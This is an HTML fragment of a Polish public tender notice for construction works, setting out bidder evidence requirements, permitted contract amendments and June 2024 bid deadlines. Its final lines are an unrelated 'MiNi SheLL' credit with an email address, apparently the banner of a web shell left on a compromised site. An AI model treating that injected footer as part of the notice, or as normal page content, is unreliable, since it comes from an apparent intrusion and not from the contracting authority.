wykonawca <br/>powołuje się na jego zasoby.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) W celu potwierdzenia spełniania przez wykonawcę warunków udziału <br/>w postępowaniu dotyczących zdolności technicznej lub zawodowej, zamawiający <br/>żąda następujących podmiotowych środków dowodowych: <br/>a) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich <br/> 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz <br/> z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na <br/>rzecz których roboty te zostały wykonane, oraz załączeniem dowodów <br/>określających, czy te roboty budowlane zostały wykonane należycie, przy czym <br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez <br/>podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca <br/>z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne <br/>odpowiednie dokumenty <br/>b) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia <br/>publicznego odpowiedzialnych za kierowanie robotami budowlanymi, wraz <br/>z informacjami na temat ich uprawnień niezbędnych do wykonania zamówienia <br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją <br/> o podstawie do dysponowania tymi osobami. <br/>2) Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych <br/>wykonywanych wspólnie z innymi wykonawcami, wykaz, o którym mowa w ppkt 1) <br/>lit a), dotyczy robót budowlanych, w których wykonaniu wykonawca ten <br/>bezpośrednio uczestniczył. <br/>3) Okresy wyrażone w latach lub miesiącach, o których mowa w ppkt 1) lit a) liczy się <br/>wstecz od dnia, w którym upływa termin składania ofert.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia. <br/>1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>2) Każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia <br/>wykazuje brak podstaw wykluczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany umowy bez przeprowadzenia nowego <br/>postępowania o udzielenie zamówienia, w zakresie i na warunkach określonych w <br/>projekcie umowy stanowiącym załącznik nr 8 do SWZ.<br/>1.	Zamawiający dopuszcza możliwość dokonywania zmian postanowień zawartej Umowy w następujących okolicznościach:<br/>1)	poprawienia omyłki pisarskiej lub rachunkowej bądź innej omyłki polegającej na niezgodności treści Umowy z Ofertą; <br/>2)	dopuszczalnej prawem zmiany stron Umowy lub oznaczenia stron Umowy – w takim zakresie w jakim będzie to niezbędne w celu dostosowania postanowień Umowy do zaistniałego stanu prawnego lub faktycznego;<br/>3)	zmiany w zakresie Przedmiotu Umowy, jeżeli konieczność wprowadzenia takiej zmiany jest skutkiem zmiany przepisów prawa – w takim zakresie w jakim będzie to niezbędne w celu dostosowania postanowień Umowy do zaistniałego stanu prawnego,<br/>4)	zmiany terminów wykonania Przedmiotu Umowy poprzez odpowiednie przedłużenie o czas niezbędny do zakończenia wykonania Przedmiotu Umowy w sposób należyty, jednak nie dłuższy niż o okres trwania okoliczności utrudniających lub uniemożliwiających realizację Umowy, tj.:<br/>a)	gdy z przyczyn niezależnych od Wykonawcy nie jest możliwe dotrzymanie terminu wykonania Przedmiotu Umowy lub jej realizacja w terminach zastrzeżonych w Umowie, <br/>b)	wystąpiła siła wyższa, czyli zjawisko zewnętrzne o charakterze nadzwyczajnym, któremu strony nie mogły zapobiec przy zachowaniu należytej staranności, znacznie utrudniające lub uniemożliwiające realizację Umowy; w tym w szczególności w przypadku wystąpienia okoliczności związanych z ogłoszeniem lub trwaniem stanu epidemii lub stanu zagrożenia epidemicznego, utrudniających lub uniemożliwiających realizację Umowy w terminach określonych w Umowie,<br/>5)	w przypadku zmiany terminu realizacji Umowy możliwa jest zmiana sposobu rozliczania wynagrodzenia, o ile jest to uzasadnione biorąc pod uwagę charakter i skutki zmian terminu realizacji Umowy.<br/>2.	W przypadku wystąpienia którejkolwiek z okoliczności opisanych w ust. 1 wyżej, które powodują konieczność zmiany Umowy, Wykonawca złoży Zamawiającemu wniosek w formie pisemnej. Wniosek musi zawierać uzasadnienie konieczności wprowadzenia zmian do Umowy oraz wszelkie niezbędne dokumenty potwierdzające zaistnienie okoliczności stanowiących podstawę dokonania zamian w umowie. <br/>3.	Przesłanki dokonania zmian Umowy, określone w ust. 1, stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.<br/>4.	Zmiany postanowień zawartej Umowy wymagają dla swej ważności formy pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-06-24 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://gdanskiewody.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-06-24 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-07-23</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych. <br/>2. Zamawiający nie dopuszcza składania ofert częściowych. <br/>3. Zamawiający nie wymaga i nie dopuszcza składania ofert wariantowych. <br/>4. Zamawiający nie przewiduje zamówień, o których mowa w art. 214 ust. 1 pkt 7 i 8 <br/>ustawy Pzp. <br/>5. Zamawiający nie wymaga złożenia oferty po odbyciu wizji lokalnej lub sprawdzeniu <br/>dokumentów niezbędnych do realizacji zamówienia, o których mowa w art. 131 ust. <br/>2 ustawy Pzp. <br/>6. Zamawiający nie przewiduje rozliczenia w walutach obcych. <br/>7. Zamawiający nie przewiduje aukcji elektronicznej. <br/>8. Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu. <br/>9. Zamawiający, zgodnie z art. 95 ustawy Pzp, nie wymaga, aby wykonawca i jego <br/>podwykonawcy zatrudniali na podstawie umowy o pracę, w okresie realizacji <br/>przedmiotu zamówienia, jakichkolwiek osób wykonujących czynności w ramach <br/>zamówienia. <br/>10. Zamawiający przewiduje możliwość zmiany umowy bez przeprowadzenia nowego <br/>postępowania o udzielenie zamówienia, w zakresie i na warunkach określonych w <br/>projekcie umowy stanowiącym załącznik nr 8 do SWZ. <br/>11. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy.

Creat By MiNi SheLL
Email: jattceo@gmail.com